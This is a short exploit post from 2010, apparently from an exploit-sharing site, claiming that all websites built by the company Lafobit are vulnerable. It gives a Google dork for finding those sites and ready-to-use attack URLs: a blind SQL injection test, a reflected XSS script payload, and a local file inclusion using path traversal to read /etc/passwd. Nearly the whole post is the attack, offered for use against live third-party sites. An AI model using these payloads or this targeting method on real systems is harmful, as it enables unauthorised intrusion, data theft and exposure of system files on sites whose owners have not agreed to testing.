Lafobit Webpages Mullti Vulnerability

Posted on 08 April 2010
=====================================
Lafobit Webpages Mullti Vulnerability
=====================================

      ______                _       _   _             
      | ___               | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _   / / _ | | | | | __| |/ _ | '_    
      | |   __/ V / (_) | | |_| | |_| | (_) | | | |   
      \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ / _` | '_ ` _   |  /| |\____ |
         | |  __/ (_| | | | | | |  |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/

_____________________________________________________________
   
[$] Exploit Title     : Lafobit Webpages Mullti Vulnerability 
[$] Date              : 08-04-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy@gmail.com
[$] Web Site          : http://www.lafobit.com
[$] Vulnerable Pages  : All pages that were created by this company are vulnerable.
[$] Bug               : Multi
[$] Google Dork       : "Desenvolvido por Lafobit"

[$] Code :


_-_-_-_-_-_-_-_-_[Blind SQL Injection]_-_-_-_-_-_-_-_-_



http://example.pt/?modulo=conteudos&link=arquivo' and+1-1=1+--+   <- False
http://example.pt/?modulo=conteudos&link=arquivo' and+1-1=0+--+   <- True


_-_-_-_-_-_-_-_-_[XSS]_-_-_-_-_-_-_-_-_


http://example.pt/modulos/downloads/download.php?id=<script>alert(/XSS/)</script>


_-_-_-_-_-_-_-_-_[LFI]_-_-_-_-_-_-_-_-_

http://example.pt/?modulo=erro../../../../../../../../../../etc/passwd%00


# Inj3ct0r.com [2010-04-08]
TOP
Malware :

Last 20
Exploits :

Last 20